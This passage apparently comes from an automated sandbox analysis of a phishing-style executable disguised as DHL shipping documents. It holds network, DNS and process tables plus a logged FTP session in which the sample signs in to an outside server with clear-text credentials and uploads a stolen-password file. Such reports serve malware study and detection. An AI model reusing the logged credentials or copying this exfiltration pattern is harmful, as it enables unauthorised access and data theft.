Aug 2, 2024 15:02:12.480220079 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.480298996 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.480365038 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.481074095 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.481129885 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.481151104 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.481199980 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.481221914 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.481251001 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.481262922 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.481271982 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.481318951 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.481318951 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.481924057 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.481956005 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.481981993 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.481991053 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.482013941 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.482033014 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.482130051 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.482191086 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.482741117 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.482795954 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.482841015 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.482888937 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.483120918 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.483189106 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.483602047 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.483650923 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.483848095 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.483896971 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.483942032 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.484025955 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.551167011 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.551219940 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.551302910 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.551326990 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.551358938 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.551384926 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.551445007 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.573103905 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.573147058 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.573256016 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.573275089 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.573307037 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.573405981 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.573458910 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.573987007 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.574023008 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.574064016 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.574068069 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:12.574114084 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.574126959 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.574291945 CEST | 49707 | 443 | 192.168.2.9 | 172.67.189.102 |
Aug 2, 2024 15:02:12.574311018 CEST | 443 | 49707 | 172.67.189.102 | 192.168.2.9 |
Aug 2, 2024 15:02:14.004463911 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
Aug 2, 2024 15:02:14.004723072 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:14.727148056 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:14.732115984 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:14.732507944 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:15.256807089 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.257108927 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:15.262059927 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.372625113 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.372781038 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:15.377616882 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.577150106 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.579257965 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:15.585046053 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.696149111 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.696368933 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:15.701306105 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.813287020 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.813568115 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:15.818932056 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.929900885 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:15.932024002 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:15.937184095 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:16.068078041 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:16.069505930 CEST | 49709 | 47808 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:16.074357986 CEST | 47808 | 49709 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:16.074471951 CEST | 49709 | 47808 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:16.074553967 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:16.079355001 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:16.545480013 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:16.550509930 CEST | 49709 | 47808 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:16.550553083 CEST | 49709 | 47808 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:16.555428982 CEST | 47808 | 49709 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:16.556070089 CEST | 47808 | 49709 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:16.556149960 CEST | 49709 | 47808 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:16.595942974 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:16.680628061 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 |
Aug 2, 2024 15:02:16.721031904 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 |
Aug 2, 2024 15:02:17.174089909 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
Aug 2, 2024 15:02:23.982774973 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:23.982898951 CEST | 49704 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:23.983156919 CEST | 49712 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:23.983198881 CEST | 443 | 49712 | 23.206.229.209 | 192.168.2.9 |
Aug 2, 2024 15:02:23.983283043 CEST | 49712 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:23.983475924 CEST | 49712 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:23.983491898 CEST | 443 | 49712 | 23.206.229.209 | 192.168.2.9 |
Aug 2, 2024 15:02:23.987704039 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
Aug 2, 2024 15:02:23.987787008 CEST | 443 | 49704 | 23.206.229.209 | 192.168.2.9 |
Aug 2, 2024 15:02:24.602525949 CEST | 443 | 49712 | 23.206.229.209 | 192.168.2.9 |
Aug 2, 2024 15:02:24.602597952 CEST | 49712 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:43.798448086 CEST | 443 | 49712 | 23.206.229.209 | 192.168.2.9 |
Aug 2, 2024 15:02:43.798580885 CEST | 49712 | 443 | 192.168.2.9 | 23.206.229.209 |
Aug 2, 2024 15:02:56.768076897 CEST | 49705 | 80 | 192.168.2.9 | 199.232.214.172 |
Aug 2, 2024 15:02:56.773600101 CEST | 80 | 49705 | 199.232.214.172 | 192.168.2.9 |
Aug 2, 2024 15:02:56.773694038 CEST | 49705 | 80 | 192.168.2.9 | 199.232.214.172 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 2, 2024 15:02:09.493565083 CEST | 52343 | 53 | 192.168.2.9 | 1.1.1.1 |
Aug 2, 2024 15:02:09.541275024 CEST | 53 | 52343 | 1.1.1.1 | 192.168.2.9 |
Aug 2, 2024 15:02:14.369546890 CEST | 49980 | 53 | 192.168.2.9 | 1.1.1.1 |
Aug 2, 2024 15:02:14.720894098 CEST | 53 | 49980 | 1.1.1.1 | 192.168.2.9 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Aug 2, 2024 15:02:09.493565083 CEST | 192.168.2.9 | 1.1.1.1 | 0xc81b | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Aug 2, 2024 15:02:14.369546890 CEST | 192.168.2.9 | 1.1.1.1 | 0xaf88 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Aug 2, 2024 15:02:09.541275024 CEST | 1.1.1.1 | 192.168.2.9 | 0xc81b | No error (0) | 172.67.189.102 | A (IP address) | IN (0x0001) | false | ||
Aug 2, 2024 15:02:09.541275024 CEST | 1.1.1.1 | 192.168.2.9 | 0xc81b | No error (0) | 104.21.65.79 | A (IP address) | IN (0x0001) | false | ||
Aug 2, 2024 15:02:14.720894098 CEST | 1.1.1.1 | 192.168.2.9 | 0xaf88 | No error (0) | wapination.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Aug 2, 2024 15:02:14.720894098 CEST | 1.1.1.1 | 192.168.2.9 | 0xaf88 | No error (0) | 108.179.234.136 | A (IP address) | IN (0x0001) | false | ||
Aug 2, 2024 15:02:23.140566111 CEST | 1.1.1.1 | 192.168.2.9 | 0x9531 | No error (0) | fp2e7a.wpc.phicdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Aug 2, 2024 15:02:23.140566111 CEST | 1.1.1.1 | 192.168.2.9 | 0x9531 | No error (0) | 192.229.221.95 | A (IP address) | IN (0x0001) | false | ||
Aug 2, 2024 15:02:36.011159897 CEST | 1.1.1.1 | 192.168.2.9 | 0x3c39 | No error (0) | fp2e7a.wpc.phicdn.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Aug 2, 2024 15:02:36.011159897 CEST | 1.1.1.1 | 192.168.2.9 | 0x3c39 | No error (0) | 192.229.221.95 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.9 | 49706 | 172.67.189.102 | 443 | 5836 | C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-08-02 13:02:10 UTC | 134 | OUT | |
2024-08-02 13:02:10 UTC | 685 | IN | |
2024-08-02 13:02:10 UTC | 684 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN | |
2024-08-02 13:02:10 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.9 | 49707 | 172.67.189.102 | 443 | 5836 | C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-08-02 13:02:11 UTC | 130 | OUT | |
2024-08-02 13:02:12 UTC | 689 | IN | |
2024-08-02 13:02:12 UTC | 680 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN | |
2024-08-02 13:02:12 UTC | 1369 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Aug 2, 2024 15:02:15.256807089 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 08:02. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
Aug 2, 2024 15:02:15.257108927 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | USER pop@wapination.net |
Aug 2, 2024 15:02:15.372625113 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 331 User pop@wapination.net OK. Password required |
Aug 2, 2024 15:02:15.372781038 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | PASS sync@#1235 |
Aug 2, 2024 15:02:15.577150106 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 230 OK. Current restricted directory is / |
Aug 2, 2024 15:02:15.696149111 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 504 Unknown command |
Aug 2, 2024 15:02:15.696368933 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | PWD |
Aug 2, 2024 15:02:15.813287020 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 257 "/" is your current location |
Aug 2, 2024 15:02:15.813568115 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | TYPE I |
Aug 2, 2024 15:02:15.929900885 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 200 TYPE is now 8-bit binary |
Aug 2, 2024 15:02:15.932024002 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | PASV |
Aug 2, 2024 15:02:16.068078041 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 227 Entering Passive Mode (108,179,234,136,186,192) |
Aug 2, 2024 15:02:16.074553967 CEST | 49708 | 21 | 192.168.2.9 | 108.179.234.136 | STOR PW_user-760639_2024_08_02_09_02_13.html |
Aug 2, 2024 15:02:16.545480013 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 150 Accepted data connection |
Aug 2, 2024 15:02:16.680628061 CEST | 21 | 49708 | 108.179.234.136 | 192.168.2.9 | 226-File successfully transferred 226-File successfully transferred226 0.121 seconds (measured here), 2.56 Kbytes per second |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 09:02:04 |
Start date: | 02/08/2024 |
Path: | C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfd0000 |
File size: | 92'672 bytes |
MD5 hash: | C9BEC29F669D714CD80E368748D7024C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 3 |
Start time: | 09:02:11 |
Start date: | 02/08/2024 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9d0000 |
File size: | 262'432 bytes |
MD5 hash: | 8FDF47E0FF70C40ED3A17014AEEA4232 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 20.8% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 7.7% |
Total number of Nodes: | 39 |
Total number of Limit Nodes: | 0 |
Graph
Function 00007FF886E32072 Relevance: 1.7, APIs: 1, Instructions: 198filenetworkCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF886E38AFA Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 684injectionCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF886E38AF8 Relevance: 2.2, APIs: 1, Instructions: 685injectionCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF886E32F19 Relevance: 1.7, APIs: 1, Instructions: 198filenetworkCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF886E31750 Relevance: .4, Instructions: 391COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF886E30FF2 Relevance: .1, Instructions: 126COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 11.4% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 17 |
Total number of Limit Nodes: | 4 |
Graph
Function 01353E48 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01359BC0 Relevance: 2.8, Instructions: 2820COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01354A60 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0135CE50 Relevance: 2.3, Instructions: 2322COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01353E3C Relevance: 4.0, Strings: 3, Instructions: 236COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01354A56 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01356CA5 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01356CB0 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013526B0 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013526A4 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01357988 Relevance: .6, Instructions: 558COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013593E4 Relevance: .4, Instructions: 388COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01359760 Relevance: .4, Instructions: 361COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01356E9F Relevance: .1, Instructions: 149COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351108 Relevance: .1, Instructions: 129COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0135F47D Relevance: .1, Instructions: 112COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351138 Relevance: .1, Instructions: 100COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01356F40 Relevance: .1, Instructions: 97COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0135F340 Relevance: .1, Instructions: 96COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351667 Relevance: .1, Instructions: 92COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0135F350 Relevance: .1, Instructions: 91COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013592D1 Relevance: .1, Instructions: 84COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01357059 Relevance: .1, Instructions: 82COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013592E0 Relevance: .1, Instructions: 78COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013591D1 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351840 Relevance: .1, Instructions: 74COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FD01C Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351342 Relevance: .1, Instructions: 71COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013591E0 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351850 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01354F52 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351678 Relevance: .1, Instructions: 69COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01354F60 Relevance: .1, Instructions: 68COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0135178A Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01350838 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01350848 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01356B4F Relevance: .1, Instructions: 60COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351452 Relevance: .1, Instructions: 57COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010FD017 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01351460 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01359910 Relevance: .1, Instructions: 52COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01358171 Relevance: .0, Instructions: 34COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01358180 Relevance: .0, Instructions: 33COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013547D8 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 013547CE Relevance: 5.2, Strings: 4, Instructions: 179COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|